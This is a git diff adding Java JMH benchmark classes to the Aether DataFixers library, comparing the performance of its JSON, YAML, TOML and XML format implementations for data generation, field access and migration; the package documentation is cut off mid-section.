+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void gsonMigration(final Blackhole blackhole) { + final Dynamic result = this.gsonFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.gsonData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + } + + /** + * Benchmarks DataFixer migration on Jackson-backed data. + * + *
+ * <p>If a dedicated Jackson fixer is available, measures native Jackson
+ * migration. Otherwise, falls back to cross-format migration using the
+ * Gson-based fixer with Jackson input data.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonMigration(final Blackhole blackhole) { + if (this.jacksonFixer == null) { + // No dedicated Jackson fixer available -> this would not be a fair "Jackson migration" benchmark. + // Measure the cross-format behavior explicitly instead. + final Dynamic result = this.gsonFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.jacksonData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + return; + } + + final Dynamic result = this.jacksonFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.jacksonData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + } + + /** + * Benchmarks cross-format migration with Jackson input and Gson-based fixer. + * + *
+ * <p>Measures the performance overhead when the fixer's DynamicOps differs
+ * from the input data's DynamicOps. This scenario is common when migrating
+ * data from various sources through a centralized fixer.</p>
+ * + *
+ * <p>Comparing this benchmark with {@link #gsonMigration} reveals the
+ * overhead of format conversion during migration.</p>
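+ * <p>For example (illustrative numbers only): if this benchmark reports 2.0 us/op while
+ * {@link #gsonMigration} reports 1.4 us/op, roughly 0.6 us/op is attributable to format conversion.</p>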
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void crossFormatMigrationJacksonInput(final Blackhole blackhole) { + final Dynamic result = this.gsonFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.jacksonData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java new file mode 100644 index 0000000..2dc134c --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java @@ -0,0 +1,358 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.format; + +import com.fasterxml.jackson.databind.JsonNode; +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.api.fix.DataFixer; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator; +import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize; +import de.splatgames.aether.datafixers.codec.toml.jackson.JacksonTomlOps; +import de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for TOML and XML DynamicOps implementations via Jackson. + * + *
+ * <p>This benchmark measures the performance of TOML and XML format operations
+ * using Jackson-based implementations ({@link JacksonTomlOps} and {@link JacksonXmlOps}).
+ * Both formats share Jackson's unified API, enabling direct performance comparison.</p>
+ * + *
+ * <h2>Benchmark Categories</h2>
+ *
+ * <h3>Data Generation</h3>
+ * <p>Measure Dynamic object construction performance:</p>
+ * <ul>
+ *   <li>{@link #tomlGenerate} - Create Dynamic using JacksonTomlOps</li>
+ *   <li>{@link #xmlGenerate} - Create Dynamic using JacksonXmlOps</li>
+ * </ul>
+ * + *
+ * <h3>Field Access</h3>
+ * <p>Measure field read operations on existing data:</p>
+ * <ul>
+ *   <li>{@link #tomlFieldRead} - Read field from TOML-backed Dynamic</li>
+ *   <li>{@link #xmlFieldRead} - Read field from XML-backed Dynamic</li>
+ * </ul>
+ * + *
+ * <h3>Field Modification</h3>
+ * <p>Measure field write/set operations:</p>
+ * <ul>
+ *   <li>{@link #tomlFieldSet} - Set field on TOML-backed Dynamic</li>
+ *   <li>{@link #xmlFieldSet} - Set field on XML-backed Dynamic</li>
+ * </ul>
+ * + *
+ * <h3>Migration</h3>
+ * <p>Measure DataFixer migration performance:</p>
+ * <ul>
+ *   <li>{@link #tomlMigration} - Apply fix to TOML-backed data</li>
+ *   <li>{@link #xmlMigration} - Apply fix to XML-backed data</li>
+ * </ul>
+ * + *
+ * <h2>Implementations</h2>
+ * <table>
+ *   <tr><th>Implementation</th><th>Library</th><th>Node Type</th><th>Use Case</th></tr>
+ *   <tr><td>{@link JacksonTomlOps}</td><td>Jackson Dataformat TOML</td><td>{@code JsonNode}</td><td>Configuration files, Rust ecosystem integration</td></tr>
+ *   <tr><td>{@link JacksonXmlOps}</td><td>Jackson Dataformat XML</td><td>{@code JsonNode}</td><td>Legacy systems, SOAP/REST APIs, document formats</td></tr>
+ * </table>
+ * + *
+ * <h2>Parameters</h2>
+ * <table>
+ *   <tr><th>Parameter</th><th>Values</th><th>Description</th></tr>
+ *   <tr><td>payloadSize</td><td>SMALL, MEDIUM</td><td>Test data complexity (LARGE excluded for performance)</td></tr>
+ * </table>
+ * + *
+ * <p>Note: The LARGE payload size is excluded from this benchmark because
+ * TOML and XML serialization typically have higher overhead than JSON/YAML,
+ * making large payloads impractical for typical use cases.</p>
+ * + *
+ * <h2>Benchmark Configuration</h2>
+ * <table>
+ *   <tr><th>Setting</th><th>Value</th></tr>
+ *   <tr><td>Warmup</td><td>5 iterations, 1 second each</td></tr>
+ *   <tr><td>Measurement</td><td>10 iterations, 1 second each</td></tr>
+ *   <tr><td>Forks</td><td>2</td></tr>
+ *   <tr><td>JVM Heap</td><td>2 GB min/max</td></tr>
+ *   <tr><td>Time Unit</td><td>Microseconds</td></tr>
+ * </table>
+ * + *
+ * <h2>Usage</h2>
+ * <pre>{@code
+ * # Run all TOML/XML benchmarks
+ * java -jar benchmarks.jar TomlXmlBenchmark
+ *
+ * # Run TOML-only benchmarks
+ * java -jar benchmarks.jar "TomlXmlBenchmark.toml.*"
+ *
+ * # Run XML-only benchmarks
+ * java -jar benchmarks.jar "TomlXmlBenchmark.xml.*"
+ *
+ * # Compare generation performance
+ * java -jar benchmarks.jar "TomlXmlBenchmark.*Generate"
+ * }</pre>
+ * + * @author Erik Pförtner + * @see JsonBenchmark + * @see YamlBenchmark + * @see CrossFormatBenchmark + * @see de.splatgames.aether.datafixers.codec.toml.jackson.JacksonTomlOps + * @see de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class TomlXmlBenchmark { + + /** + * Field name used for read/write benchmarks. + * + *
+ * <p>References the first string field generated by {@link BenchmarkDataGenerator}.</p>
+ */ + private static final String FIELD_NAME = "stringField0"; + + /** + * Payload size parameter controlling test data complexity. + * + *
+ * <p>Limited to SMALL and MEDIUM to avoid excessive benchmark runtime
+ * with the higher overhead of TOML and XML processing.</p>
+ */ + @Param({"SMALL", "MEDIUM"}) + private PayloadSize payloadSize; + + /** + * Jackson TOML DynamicOps implementation. + */ + private JacksonTomlOps tomlOps; + + /** + * Jackson XML DynamicOps implementation. + */ + private JacksonXmlOps xmlOps; + + /** + * Pre-generated test data using TOML format. + */ + private Dynamic tomlData; + + /** + * Pre-generated test data using XML format. + */ + private Dynamic xmlData; + + /** + * DataFixer for migration benchmarks. + */ + private DataFixer fixer; + + /** + * Source version for migrations (v1). + */ + private DataVersion fromVersion; + + /** + * Target version for migrations (v2). + */ + private DataVersion toVersion; + + /** + * Initializes DynamicOps instances, test data, and DataFixer. + * + *
+ * <p>Both TOML and XML data are pre-generated to isolate benchmark
+ * measurements from data creation overhead.</p>
+ */ + @Setup(Level.Trial) + public void setup() { + this.tomlOps = JacksonTomlOps.INSTANCE; + this.xmlOps = JacksonXmlOps.INSTANCE; + + this.tomlData = BenchmarkDataGenerator.generate(this.tomlOps, this.payloadSize); + this.xmlData = BenchmarkDataGenerator.generate(this.xmlOps, this.payloadSize); + + this.fixer = BenchmarkBootstrap.createSingleFixFixer(); + this.fromVersion = new DataVersion(1); + this.toVersion = new DataVersion(2); + } + + // ==================== Data Generation Benchmarks ==================== + + /** + * Benchmarks Dynamic object generation using JacksonTomlOps. + * + *
+ * <p>Measures the time to create a complete test data structure using
+ * Jackson's TOML dataformat module.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void tomlGenerate(final Blackhole blackhole) { + final Dynamic data = BenchmarkDataGenerator.generate(this.tomlOps, this.payloadSize); + blackhole.consume(data); + } + + /** + * Benchmarks Dynamic object generation using JacksonXmlOps. + * + *
+ * <p>Measures the time to create a complete test data structure using
+ * Jackson's XML dataformat module.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void xmlGenerate(final Blackhole blackhole) { + final Dynamic data = BenchmarkDataGenerator.generate(this.xmlOps, this.payloadSize); + blackhole.consume(data); + } + + // ==================== Field Access Benchmarks ==================== + + /** + * Benchmarks field read access on TOML-backed Dynamic. + * + *
+ * <p>Measures the time to retrieve a single field from a pre-existing
+ * TOML-based Dynamic object.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void tomlFieldRead(final Blackhole blackhole) { + final Dynamic field = this.tomlData.get(FIELD_NAME); + blackhole.consume(field); + } + + /** + * Benchmarks field read access on XML-backed Dynamic. + * + *
+ * <p>Measures the time to retrieve a single field from a pre-existing
+ * XML-based Dynamic object.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void xmlFieldRead(final Blackhole blackhole) { + final Dynamic field = this.xmlData.get(FIELD_NAME); + blackhole.consume(field); + } + + // ==================== Field Modification Benchmarks ==================== + + /** + * Benchmarks field set operation on TOML-backed Dynamic. + * + *
+ * <p>Measures the time to add a new field to a TOML-based Dynamic object.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void tomlFieldSet(final Blackhole blackhole) { + final Dynamic result = this.tomlData.set( + "newField", + this.tomlData.createString("newValue") + ); + blackhole.consume(result); + } + + /** + * Benchmarks field set operation on XML-backed Dynamic. + * + *
+ * <p>Measures the time to add a new field to an XML-based Dynamic object.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void xmlFieldSet(final Blackhole blackhole) { + final Dynamic result = this.xmlData.set( + "newField", + this.xmlData.createString("newValue") + ); + blackhole.consume(result); + } + + // ==================== Migration Benchmarks ==================== + + /** + * Benchmarks DataFixer migration on TOML-backed data. + * + *
+ * <p>Measures the time to apply a single fix migration to TOML-based
+ * Dynamic data.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void tomlMigration(final Blackhole blackhole) { + final Dynamic result = this.fixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.tomlData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + } + + /** + * Benchmarks DataFixer migration on XML-backed data. + * + *
+ * <p>Measures the time to apply a single fix migration to XML-based
+ * Dynamic data.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void xmlMigration(final Blackhole blackhole) { + final Dynamic result = this.fixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.xmlData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java new file mode 100644 index 0000000..c0f2862 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java @@ -0,0 +1,354 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.format; + +import com.fasterxml.jackson.databind.JsonNode; +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.api.fix.DataFixer; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator; +import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize; +import de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps; +import de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark comparing YAML DynamicOps implementations: SnakeYAML vs Jackson YAML. + * + *
+ * <p>This benchmark measures the performance of YAML-based operations using two
+ * different underlying libraries: SnakeYAML ({@link SnakeYamlOps}) and Jackson YAML
+ * ({@link JacksonYamlOps}). YAML is commonly used for configuration files and
+ * human-readable data serialization.</p>
+ * + *
+ * <h2>Benchmark Categories</h2>
+ *
+ * <h3>Data Generation</h3>
+ * <p>Measure Dynamic object construction performance:</p>
+ * <ul>
+ *   <li>{@link #snakeYamlGenerate} - Create Dynamic using SnakeYamlOps</li>
+ *   <li>{@link #jacksonYamlGenerate} - Create Dynamic using JacksonYamlOps</li>
+ * </ul>
+ * + *
+ * <h3>Field Access</h3>
+ * <p>Measure field read operations on existing data:</p>
+ * <ul>
+ *   <li>{@link #snakeYamlFieldRead} - Read field from SnakeYAML-backed Dynamic</li>
+ *   <li>{@link #jacksonYamlFieldRead} - Read field from Jackson YAML-backed Dynamic</li>
+ * </ul>
+ * + *
+ * <h3>Field Modification</h3>
+ * <p>Measure field write/set operations:</p>
+ * <ul>
+ *   <li>{@link #snakeYamlFieldSet} - Set field on SnakeYAML-backed Dynamic</li>
+ *   <li>{@link #jacksonYamlFieldSet} - Set field on Jackson YAML-backed Dynamic</li>
+ * </ul>
+ * + *
+ * <h3>Migration</h3>
+ * <p>Measure DataFixer migration performance:</p>
+ * <ul>
+ *   <li>{@link #snakeYamlMigration} - Apply fix to SnakeYAML-backed data</li>
+ *   <li>{@link #jacksonYamlMigration} - Apply fix to Jackson YAML-backed data</li>
+ * </ul>
+ * + *
+ * <h2>Implementations Compared</h2>
+ * <table>
+ *   <tr><th>Implementation</th><th>Library</th><th>Node Type</th><th>Characteristics</th></tr>
+ *   <tr><td>{@link SnakeYamlOps}</td><td>SnakeYAML</td><td>{@code Object} (native Java types)</td><td>Native YAML library, uses Maps/Lists, anchors & aliases support</td></tr>
+ *   <tr><td>{@link JacksonYamlOps}</td><td>Jackson Dataformat YAML</td><td>{@code JsonNode}</td><td>Unified Jackson API, shares code with JSON, streaming support</td></tr>
+ * </table>
+ * + *
+ * <h2>Parameters</h2>
+ * <table>
+ *   <tr><th>Parameter</th><th>Values</th><th>Description</th></tr>
+ *   <tr><td>payloadSize</td><td>SMALL, MEDIUM, LARGE</td><td>Test data complexity</td></tr>
+ * </table>
+ * + *
+ * <h2>Benchmark Configuration</h2>
+ * <table>
+ *   <tr><th>Setting</th><th>Value</th></tr>
+ *   <tr><td>Warmup</td><td>5 iterations, 1 second each</td></tr>
+ *   <tr><td>Measurement</td><td>10 iterations, 1 second each</td></tr>
+ *   <tr><td>Forks</td><td>2</td></tr>
+ *   <tr><td>JVM Heap</td><td>2 GB min/max</td></tr>
+ *   <tr><td>Time Unit</td><td>Microseconds</td></tr>
+ * </table>
+ * + *
+ * <h2>Usage</h2>
+ * <pre>{@code
+ * # Run all YAML benchmarks
+ * java -jar benchmarks.jar YamlBenchmark
+ *
+ * # Compare only generation performance
+ * java -jar benchmarks.jar "YamlBenchmark.*Generate"
+ *
+ * # Run SnakeYAML-only benchmarks
+ * java -jar benchmarks.jar "YamlBenchmark.snakeYaml.*"
+ *
+ * # Run with specific payload size
+ * java -jar benchmarks.jar YamlBenchmark -p payloadSize=MEDIUM
+ * }</pre>
+ * + * @author Erik Pförtner + * @see JsonBenchmark + * @see TomlXmlBenchmark + * @see CrossFormatBenchmark + * @see de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps + * @see de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class YamlBenchmark { + + /** + * Field name used for read/write benchmarks. + * + *
+ * <p>References the first string field generated by {@link BenchmarkDataGenerator}.</p>
+ */ + private static final String FIELD_NAME = "stringField0"; + + /** + * Payload size parameter controlling test data complexity. + * + *
+ * <p>Injected by JMH to run benchmarks across different data sizes.</p>
+ */ + @Param({"SMALL", "MEDIUM", "LARGE"}) + private PayloadSize payloadSize; + + /** + * SnakeYAML DynamicOps implementation using native Java types. + */ + private SnakeYamlOps snakeOps; + + /** + * Jackson YAML DynamicOps implementation using JsonNode. + */ + private JacksonYamlOps jacksonOps; + + /** + * Pre-generated test data using SnakeYAML. + */ + private Dynamic snakeYamlData; + + /** + * Pre-generated test data using Jackson YAML. + */ + private Dynamic jacksonYamlData; + + /** + * DataFixer for migration benchmarks. + */ + private DataFixer fixer; + + /** + * Source version for migrations (v1). + */ + private DataVersion fromVersion; + + /** + * Target version for migrations (v2). + */ + private DataVersion toVersion; + + /** + * Initializes DynamicOps instances, test data, and DataFixer. + * + *

Both SnakeYAML and Jackson YAML data are pre-generated to isolate benchmark measurements from data creation overhead.

+ */ + @Setup(Level.Trial) + public void setup() { + this.snakeOps = SnakeYamlOps.INSTANCE; + this.jacksonOps = JacksonYamlOps.INSTANCE; + + this.snakeYamlData = BenchmarkDataGenerator.generate(this.snakeOps, this.payloadSize); + this.jacksonYamlData = BenchmarkDataGenerator.generate(this.jacksonOps, this.payloadSize); + + this.fixer = BenchmarkBootstrap.createSingleFixFixer(); + this.fromVersion = new DataVersion(1); + this.toVersion = new DataVersion(2); + } + + // ==================== Data Generation Benchmarks ==================== + + /** + * Benchmarks Dynamic object generation using SnakeYamlOps. + * + *

Measures the time to create a complete test data structure using SnakeYAML's native Java type representation (Maps and Lists).

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void snakeYamlGenerate(final Blackhole blackhole) { + final Dynamic data = BenchmarkDataGenerator.generate(this.snakeOps, this.payloadSize); + blackhole.consume(data); + } + + /** + * Benchmarks Dynamic object generation using JacksonYamlOps. + * + *

Measures the time to create a complete test data structure using Jackson's JsonNode representation for YAML.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonYamlGenerate(final Blackhole blackhole) { + final Dynamic data = BenchmarkDataGenerator.generate(this.jacksonOps, this.payloadSize); + blackhole.consume(data); + } + + // ==================== Field Access Benchmarks ==================== + + /** + * Benchmarks field read access on SnakeYAML-backed Dynamic. + * + *

Measures the time to retrieve a single field from a pre-existing SnakeYAML-based Dynamic object (backed by a Java Map).

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void snakeYamlFieldRead(final Blackhole blackhole) { + final Dynamic field = this.snakeYamlData.get(FIELD_NAME); + blackhole.consume(field); + } + + /** + * Benchmarks field read access on Jackson YAML-backed Dynamic. + * + *

Measures the time to retrieve a single field from a pre-existing Jackson YAML-based Dynamic object.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonYamlFieldRead(final Blackhole blackhole) { + final Dynamic field = this.jacksonYamlData.get(FIELD_NAME); + blackhole.consume(field); + } + + // ==================== Field Modification Benchmarks ==================== + + /** + * Benchmarks field set operation on SnakeYAML-backed Dynamic. + * + *

Measures the time to add a new field to a SnakeYAML-based Dynamic object.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void snakeYamlFieldSet(final Blackhole blackhole) { + final Dynamic result = this.snakeYamlData.set( + "newField", + this.snakeYamlData.createString("newValue") + ); + blackhole.consume(result); + } + + /** + * Benchmarks field set operation on Jackson YAML-backed Dynamic. + * + *

Measures the time to add a new field to a Jackson YAML-based Dynamic object.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonYamlFieldSet(final Blackhole blackhole) { + final Dynamic result = this.jacksonYamlData.set( + "newField", + this.jacksonYamlData.createString("newValue") + ); + blackhole.consume(result); + } + + // ==================== Migration Benchmarks ==================== + + /** + * Benchmarks DataFixer migration on SnakeYAML-backed data. + * + *

Measures the time to apply a single fix migration to SnakeYAML-based Dynamic data.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void snakeYamlMigration(final Blackhole blackhole) { + final Dynamic result = this.fixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.snakeYamlData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + } + + /** + * Benchmarks DataFixer migration on Jackson YAML-backed data. + * + *

Measures the time to apply a single fix migration to Jackson YAML-based Dynamic data.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonYamlMigration(final Blackhole blackhole) { + final Dynamic result = this.fixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.jacksonYamlData, + this.fromVersion, + this.toVersion + ); + blackhole.consume(result); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/package-info.java new file mode 100644 index 0000000..d2c5b40 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/package-info.java @@ -0,0 +1,158 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +/** + * Format-focused JMH benchmarks comparing DynamicOps implementations in the Aether DataFixers framework. + * + *

This package contains benchmarks that compare the performance of different serialization format implementations. These benchmarks help users choose the optimal DynamicOps implementation for their specific use case based on empirical performance data.


Benchmark Classes

Class | Formats Compared | Key Metrics
{@link de.splatgames.aether.datafixers.benchmarks.format.JsonBenchmark} | GsonOps vs JacksonJsonOps | Generation, field access, modification, migration
{@link de.splatgames.aether.datafixers.benchmarks.format.YamlBenchmark} | SnakeYamlOps vs JacksonYamlOps | Generation, field access, modification, migration
{@link de.splatgames.aether.datafixers.benchmarks.format.TomlXmlBenchmark} | JacksonTomlOps vs JacksonXmlOps | Generation, field access, modification, migration
{@link de.splatgames.aether.datafixers.benchmarks.format.CrossFormatBenchmark} | All format pairs | Cross-format conversion overhead

Supported DynamicOps Implementations

Format | Implementation | Library | Node Type
JSON | GsonOps | Google Gson | JsonElement
JSON | JacksonJsonOps | Jackson Databind | JsonNode
YAML | SnakeYamlOps | SnakeYAML | Object (native)
YAML | JacksonYamlOps | Jackson Dataformat YAML | JsonNode
TOML | JacksonTomlOps | Jackson Dataformat TOML | JsonNode
XML | JacksonXmlOps | Jackson Dataformat XML | JsonNode

Benchmark Operations

Each format benchmark measures the following operations:

  • Data Generation: Time to create Dynamic objects from scratch
  • Field Read: Time to retrieve a single field from existing data
  • Field Set: Time to add/modify a field (creates new immutable structure)
  • Migration: Time to apply a DataFix to format-specific data
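
As a rough sketch, each measured operation corresponds to one call against the shared API (GsonOps is chosen arbitrarily here; any DynamicOps implementation works the same way):

{@code
DataFixer fixer = BenchmarkBootstrap.createSingleFixFixer();

Dynamic data = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.SMALL); // generation
Dynamic field = data.get("stringField0");                                            // field read
Dynamic updated = data.set("newField", data.createString("newValue"));               // field set
Dynamic migrated = fixer.update(BenchmarkBootstrap.BENCHMARK_TYPE, data,
        new DataVersion(1), new DataVersion(2));                                     // migration
}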

Running Format Benchmarks

{@code
# Run all format benchmarks
java -jar benchmarks.jar ".*format.*"

# Run specific format benchmark
java -jar benchmarks.jar JsonBenchmark
java -jar benchmarks.jar YamlBenchmark
java -jar benchmarks.jar TomlXmlBenchmark
java -jar benchmarks.jar CrossFormatBenchmark

# Run all JSON-related benchmarks
java -jar benchmarks.jar ".*Json.*"

# Run generation benchmarks across all formats
java -jar benchmarks.jar ".*Benchmark.*Generate"

# Run migration benchmarks across all formats
java -jar benchmarks.jar ".*Benchmark.*Migration"

# Run with specific payload size
java -jar benchmarks.jar ".*format.*" -p payloadSize=MEDIUM
}

Choosing a DynamicOps Implementation

Use these benchmark results to guide implementation selection:

Scenario | Recommended | Rationale
General JSON processing | GsonOps or JacksonJsonOps | Compare benchmarks; both are mature and fast
Configuration files (YAML) | SnakeYamlOps | Native YAML features (anchors, aliases)
Mixed Jackson ecosystem | JacksonJsonOps/JacksonYamlOps | Shared code, faster cross-format conversion
TOML configuration | JacksonTomlOps | Only TOML option; good for Rust interop
Legacy XML systems | JacksonXmlOps | Only XML option; document format support

Cross-Format Conversion

The {@link de.splatgames.aether.datafixers.benchmarks.format.CrossFormatBenchmark} measures conversion overhead between formats. Key insights:

